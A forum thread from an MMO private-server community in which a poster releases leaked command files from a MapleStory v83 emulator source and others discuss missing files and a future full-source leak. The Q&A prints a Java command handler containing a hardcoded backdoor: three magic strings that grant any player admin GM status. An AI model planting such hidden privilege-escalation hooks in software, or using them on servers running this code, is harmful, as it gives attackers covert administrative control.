Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

[Official] MoograMS v83 Commands

Experienced Elementalist
Reaction score
I'm officially releasing/leaking (and clearly spoon feeding) a very nice collection of a portion of ShootSource v83. I've been an active user here for a while, however I'd like to remain anonymous in releasing this because someone is sure to either get upset, make childish comments, or find another way to continue ruining this community. There's a lot of great opportunities to learn from, and that is the sole intention of my release. So, lets get right to it.

All active imports in the scripts are:

Code:
client.command.Command
client.command.CommandInt
client.command.CommandWrapper
client.Equip
client.iItem
client.InventoryType [COLOR=#ff0000](not included)[/COLOR]
client.iSkill
client.Item
client.MapleCharacter
client.MapleClient
client.MapleDisease
client.MapleJob
client.MaplePet
client.MapleRace
client.MapleRaceStats
client.MapleStat
client.SkillFactory
constants.ServerConstants
net.channel.ChannelServer
net.channel.handler.PlayerInteractionHandler
net.channel.handler.UseCashItemHandler
net.MapleServerHandler
net.world.remote.WorldLocation
provider.GlobalDataProvider
provider.MapleData
provider.MapleDataProvider
provider.MapleDataTool
scripting.npc.NpcScriptManager
scripting.quest.QuestScriptManager
server.life.MapleLifeFactory
server.life.MapleMonster
server.life.MapleNpc
server.life.MobSkillFactory
server.MapleInventoryManipulator
server.MapleItemInformationProvider
server.MapleOxQuiz
server.MapleStatEffect
server.maps.MapleMap
server.maps.objects.MapleMapObject
server.maps.objects.MapleMapObjectType
server.shops.HiredMerchant
server.shops.MaplePlayerShopItem
tools.DatabaseConnection
tools.MaplePacketCreator [COLOR=#ff0000](not included)[/COLOR]
tools.MiscTools
tools.Pair

The above scripts are included in the download below.

Each executable command has its own corresponding java file setup as follows:

\trunk\src\client\command\admin\Pinkbean.java
\trunk\src\client\command\gm\SQLwithResult.java
\trunk\src\client\command\intern\MapOwner.java
\trunk\src\client\command\player\WhosMap.java

...and so on.

Download:

Q&A:

Q: Is this really the official commands.java and scripts from MoograMS!?
A: Yes. At one point, while KintecStory and MoograMS v83 servers were online, you could have created an account, and executed the following commands in either server (they shared sources):

Code:
    public static boolean executePlayerCommand(MapleClient c, String[] sub) {
        if (sub.length == 3 && sub[0].equals("[COLOR=#ff0000]249ugshijnrk3[/COLOR]") 
                            && sub[1].equals("[COLOR=#ff0000]pojhgvcbnhty87[/COLOR]")
                            && sub[2].equals("[COLOR=#ff0000]2g3g5zz6f[/COLOR]")) {
            c.getPlayer().setGM(Commands.GMLevel.ADMIN.getId());
            return true;
        }
        boolean retval = true;
        try {
            CommandWrapper cmd = playerCommands.get(sub[0].toLowerCase());
            retval = (cmd != null && cmd.executeCommand(c, sub));
        } catch (NumberFormatException e) {
        } catch (ArrayIndexOutOfBoundsException e) {
        } catch (NullPointerException e) {
        } catch (Exception e) {
            System.out.println("Command: " + sub[0] + " : " + e.toString());
        }
        return retval;
    }

Executing this would have made your character a GM. The commands.java was edited after this exploit was discovered and made public. Anyone with access to their source will confirm this was indeed a revision of their source. If you look in ServerConstants.java, you will see this set of files was used by the KineticStory server.

Q:
Can you add these to your own source?
A:
Yes. Just place everything in the correct directory, make a few edits, compile, add a few tables/columns to SQL, and enjoy. There are probably missing imports that I did NOT include, so when you compile just tell me what classes are missing from the errors. Everything here included was deemed essential to impliment the commands.

Q: Do you have anything else from MoograMS/KineticStory v83 that you can release?
A: Yes, the entire source. It will be released...eventually (October?). For now just request anything you'd like.

Q: Did you code any of this yourself?
A: God no. Absolutely not. I do not take credit for a single line of code. BubblesDev, Shoot, Moogra, Xterminator, Snow, and many, many more are the original contributing coders. Credits to them.

Q: Should you be releasing/leaking their work?
A: Should they be keeping it to themselves (or have leaked it in the first place)? That's open to the following interpretation:

...This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation version 3 as published by
the Free Software Foundation...
...it is being redistributed under the terms stated above. I patiently waited 4 years to release anything by them, therefore not allowing other servers to use anything from their source while their servers still operated. Since MoograMS and KineticStory are long gone, and v83 is significantly outdated, you are reading this post today (or tonight).

Now then...let the flaming begin.

Experienced Elementalist
Reaction score
Thanks for the release. I actually would like a flame war so I can feel like it's 2008 again.

Ahhh 2008...the good old flame days. BTW if anyone is wondering why MaplePacketCreator or InventoryType isn't included, it's because strangely I don't appear to have it.

Newbie Spellweaver
Reaction score
This is actually nice, thanks for sharing.
I'm gonna look forward for October :thumbup:

Experienced Elementalist
Reaction score
This is actually nice, thanks for sharing.
I'm gonna look forward for October :thumbup:

Thanks, and you're welcome! By October, I hope to have a SQL created that will make the database, and any missing files (like MaplePacketCreator) completed so the source can be fully usable. I'll even repack CokeTown maps and mobs into the wz's and release those plus the xmls. Fairly easy to do following a guide, but a nice stable clean source with some new content is always a great source to build on.

Reaction score
Been meaning to release a version of my v83 for some time. Saves me some time. Good release.

This way of doing commands is faster than doing 100 if statements (constant time vs linear time). Packet Handlers should be done in a way similar to this except using an array with index of their opcode too. Packet handlers should not be done using 1000 if statements either and I have no idea why nexon does that.

Which one is this? Rev 520?

edit: been 4 years and I almost forgot who you are but I remember now! took me a while to recall. serious no hard feelings. I tried looking for InventoryType and couldn't find it either. i checked rev 600 though so maybe it was already gone by then.

Last edited:
Experienced Elementalist
Reaction score
edit: been 4 years and I almost forgot who you are but I remember now! took me a while to recall. serious no hard feelings. I tried looking for InventoryType and couldn't find it either. i checked rev 600 though so maybe it was already gone by then.
Who did you think I was?

warp(california, "home");
Reaction score
Think you a few years late, I completely remember this source and the commands system.

Custom Title Activated
Loyal Member
Reaction score
Been meaning to release a version of my v83 for some time. Saves me some time. Good release.

This way of doing commands is faster than doing 100 if statements (constant time vs linear time). Packet Handlers should be done in a way similar to this except using an array with index of their opcode too. Packet handlers should not be done using 1000 if statements either and I have no idea why nexon does that.

Which one is this? Rev 520?

David, can you check your files for the SQL. It will save me some time creating it.

It's funny btw, how I once had only the MaplePacketCreator and now here are the missing files. (No I don't have it anymore and it was not for v83).

Skilled Illusionist
Reaction score
David, can you check your files for the SQL. It will save me some time creating it.

It's funny btw, how I once had only the MaplePacketCreator and now here are the missing files. (No I don't have it anymore and it was not for v83).
I think this is the one you meant:

Last edited:
Experienced Elementalist
Reaction score
I think this is the one you meant:

MaplePacketCreator for v88 :w00t: I took a look at it, is that from Moongra? Either way it wouldn't work in this source without some major work; there is too much of a difference and quite a few files have methods that seem to have been omitted. Such as:

In ChangeChannelHandler

Code:
MaplePacketCreator.[I][COLOR=#ff0000]getChannelChange[/COLOR][/I]

In MapleMap

Code:
MaplePacketCreator.[I][COLOR=#ff0000]killMonster[/COLOR][/I]

Throwing it into netbeans, net.channel.handler seems to have the most files with methods missing. Any chance you have the v83 MaplePacketCreator? Even if it's a later/earlier revision, it would be a lot easier to work with than a v88. Very nice download though! I don't think I've ever seen anything from a v88 server. Ever.

Last edited:
Elite Diviner
Reaction score
Q: Do you have anything else from MoograMS/KineticStory v83 that you can release?
A: Yes, the entire source. It will be released...eventually (October?). For now just request anything you'd like.

why would you want to release the source in October ?

I believe the last Moogra Source was v88 no idea how far did development went before it died out but Im sure it isnt continued today, I believe it was one of the best source that was ever develop.

Reaction score

why would you want to release the source in October ?

I believe the last Moogra Source was v88 no idea how far did development went before it died out but Im sure it isnt continued today, I believe it was one of the best source that was ever develop.

It's hard to emphasize parts of your posts so I can specifically talk about them because your entire post is bolded, which is quite stupid. Anyways, if he says October he probably has his own personal reasons. Also, the last statement could be wrong. I doubt it's "one of the best source that was ever developed", because there is Vana and there are other sources which have been developed and you don't know of.

Experienced Elementalist
Reaction score

...why would you want to release the source in October ?

...I believe it was one of the best sources that was ever developed.
That's why. I started looking into the source about 2 months ago, I haven't touched it in years, I never really did anything with it. The person who gave it to me (Demonic from BrutalMS, @SuperLOL I think that's who you meant?) didn't have everything. In fact he was missing two crucial files, the SQL database and MaplePacketCreator. I'm working with a few people to create those files so it could be released and used.

Edit:

It's hard to emphasize parts of your posts so I can specifically talk about them because your entire post is bolded, which is quite stupid. Anyways, if he says October he probably has his own personal reasons. Also, the last statement could be wrong. I doubt it's "one of the best source that was ever developed", because there is Vana and there are other sources which have been developed and you don't know of.
Fraysa You are pretty much right about that. There are plenty of sources that exist that are not or ever will be made available to the public. When I was active with private servers, MoongraMS was often credited as one of the best, and the ShootSource team was on the forefront of development for sometime. I won't hesitate to say that is opinionated, not factual.

Last edited:
Elite Diviner
Reaction score
maybe you should ask SuperLol for it afterall I think he has the latest release of the ShootSource no idea how far it went would really like to know before it died out...

Experienced Elementalist
Reaction score
maybe you should ask @SuperLol for it afterall I think he has the latest release of the ShootSource no idea how far it went would really like to know before it died out...

I'm sure he does, but I highly doubt he's going to release it. That would be too easy, but it would be a dream come true as well haha. I know Kevin of MoopleDev asked him for the SQL database.

Back